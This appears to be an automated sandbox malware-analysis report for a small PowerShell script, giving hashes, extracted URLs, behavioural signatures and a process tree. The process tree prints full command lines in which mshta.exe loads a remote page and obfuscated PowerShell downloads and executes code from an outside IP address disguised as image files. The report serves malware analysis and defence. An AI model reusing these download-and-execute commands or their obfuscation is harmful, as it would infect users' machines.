Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
- max time kernel: 118s
- max time network: 119s
- platform: windows7_x64
- resource: win7-20240903-en
- resource tags: arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
- submitted: 18/11/2024, 15:47
Static task: static1
Behavioral task: behavioral1
Sample: prueba.ps1
Resource: win7-20240903-en
General
- Target: prueba.ps1
- Size: 124B
- MD5: 6542fcabb69f2e45e5abb6ef369d6b4b
- SHA1: a9e758873a6c57d87b7e3bf02cfc04be6959d59b
- SHA256: fd4dd13239fcd0e3171711951768b399b1b2210af3e6b4f7cc1c0a594bff7133
- SHA512: 6f9a75d4e17909c0dea87683bec1286964b8b21db927650c72db8b33df37b07a16b84bd56db42a5055e20c1895821b541467812dc03d5cefb4a144cebb2afb26
Malware Config
- Extracted: http://185.147.124.40/Capcha.html
- Extracted: http://185.147.124.40/x/8.png
- Extracted: http://185.147.124.40/x/4.png
Signatures
- Blocklisted process makes network request (3 IoCs)
  flow  pid   Process
  4     2164  mshta.exe
  5     1616  powershell.exe
  6     2924  powershell.exe
- pid   Process
  2508  powershell.exe
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Gathers network information (2 TTPs, 2 IoCs)
  Uses commandline utility to view network configuration.
  pid   Process
  1832  ipconfig.exe
  112   ipconfig.exe
- description  ioc                                                                                                           Process
  Key created  \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main  mshta.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  pid   Process
  2508  powershell.exe
  2924  powershell.exe
  1616  powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2508  powershell.exe
  Token: SeDebugPrivilege  2924  powershell.exe
  Token: SeDebugPrivilege  1616  powershell.exe
- Suspicious use of WriteProcessMemory (15 IoCs)
  description                        pid   Process         procid_target
  PID 2508 wrote to memory of 2164   2508  powershell.exe  31
  PID 2508 wrote to memory of 2164   2508  powershell.exe  31
  PID 2508 wrote to memory of 2164   2508  powershell.exe  31
  PID 2164 wrote to memory of 1616   2164  mshta.exe       33
  PID 2164 wrote to memory of 1616   2164  mshta.exe       33
  PID 2164 wrote to memory of 1616   2164  mshta.exe       33
  PID 2164 wrote to memory of 2924   2164  mshta.exe       35
  PID 2164 wrote to memory of 2924   2164  mshta.exe       35
  PID 2164 wrote to memory of 2924   2164  mshta.exe       35
  PID 2924 wrote to memory of 1832   2924  powershell.exe  37
  PID 2924 wrote to memory of 1832   2924  powershell.exe  37
  PID 2924 wrote to memory of 1832   2924  powershell.exe  37
  PID 1616 wrote to memory of 112    1616  powershell.exe  38
  PID 1616 wrote to memory of 112    1616  powershell.exe  38
  PID 1616 wrote to memory of 112    1616  powershell.exe  38
Processes
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\prueba.ps1
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2508
  - C:\Windows\System32\mshta.exe
    "C:\Windows\System32\mshta.exe" http://185.147.124.40/Capcha.html
    - Blocklisted process makes network request
    - Modifies Internet Explorer settings
    - Suspicious use of WriteProcessMemory
    PID:2164
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://185.147.124.40/x/8.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID:1616
      - C:\Windows\system32\ipconfig.exe
        "C:\Windows\system32\ipconfig.exe" /flushdns
        - Gathers network information
        PID:112
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://185.147.124.40/x/4.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID:2924
      - C:\Windows\system32\ipconfig.exe
        "C:\Windows\system32\ipconfig.exe" /flushdns
        - Gathers network information
        PID:1832
Network
MITRE ATT&CK Enterprise v15
Downloads
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 1e97cdeb650179fea1d1dd7e98f2cd27
  SHA1: a9ca893e9391ea8e6f8f1a0f9dea31c8cfd7442f
  SHA256: 00f543df333ee72ba371f4df90e32ef9fc14327352823c8e30eec4c2e00604ae
  SHA512: b938861dbf04dc46b2ac673be270de2c98ea02b77abc3dba617ea72c567abdf73efaf77bbaf8c91cee92ea982ed55d9b423bf45340fab7764f807503ed16920c